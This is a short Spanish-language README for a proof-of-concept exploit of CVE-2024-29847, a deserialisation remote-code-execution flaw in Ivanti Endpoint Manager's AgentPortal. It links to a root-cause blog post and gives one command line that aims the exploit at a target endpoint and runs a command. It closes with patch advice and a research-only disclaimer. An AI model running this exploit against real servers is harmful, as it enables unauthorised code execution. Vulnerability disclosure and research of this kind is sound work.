
Exploit para CVE-2024-29847
PoC para la vulnerabilidad de ejecución remota de código por deserialización de datos no confiables en AgentPortal de Ivanti Endpoint Manager (CVE-2024-29847)
Un análisis de causa raíz de la vulnerabilidad se puede encontrar en mi blog:
https://summoning.team/blog/ivanti-epm-CVE-2024-29847-deserialization-RCE/
CVE-2024-29847.exe --uselease --installdir "C:\Program Files\LANDesk\ManagementSuite\LANDesk\ManagementSuite\Core\Core.Webservices" tcp://192.168.0.200:49669/LDSM exec test
Actualice a la última versión o mitigue siguiendo este enlace
Este software ha sido creado únicamente con fines de investigación académica y para el desarrollo de técnicas defensivas eficaces, y no está destinado a ser utilizado para atacar sistemas salvo que se cuente con autorización explícita. Los mantenedores del proyecto no son responsables ni se hacen responsables del uso indebido del software. Úselo con responsabilidad.